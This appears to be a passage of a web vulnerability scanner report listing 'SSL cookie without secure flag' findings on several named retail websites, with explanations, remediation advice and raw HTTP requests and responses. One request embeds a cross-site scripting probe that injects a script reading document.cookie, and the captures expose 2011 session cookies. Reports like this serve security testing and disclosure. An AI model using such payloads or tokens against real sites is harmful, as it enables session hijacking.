Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<div class="ptco-wrap">


<form method="post" action="Login.aspx?ReturnUrl=%2fSecure%2fYourAccount.aspx" id="form1" autocomplete="off">
<div class="aspNetHidden">
...[SNIP]...
<td>
<input name="ctl00$ctl00$cphBody$cphBody$txtPassword" type="password" maxlength="100" id="txtPassword" tabindex="2" autocomplete="off" size="32" onkeypress="javascript:return clickButton(event,&#39;btnLogin&#39;);" style="width:200px" /><br />
...[SNIP]...

9. SSL cookie without secure flag set
There are 19 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...

9.2. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...

9.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...

9.4. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511373000%7C1308103373000%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305513173003%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:47:05 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://www.acehardware.com/home/index.jsp?rdir=1A
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 293

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.acehardware.com/home/in
...[SNIP]...

9.5. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...

9.6. https://www.footlocker.com/account/default/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

9.7. https://www.petsmart.com/coreg/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.petsmart.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=register HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:17:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://www.petsmart.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 307

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.petsmart.com/checkout/
...[SNIP]...

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:20 GMT
Content-Length: 1134

<script type="text/javascript" charset="utf-8">
                   typeAhead('#search-input-field',5);
               </script>
           <form action="/search/results.jsp" class="hasrequired header-search" method="get"><input value
...[SNIP]...

9.9. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
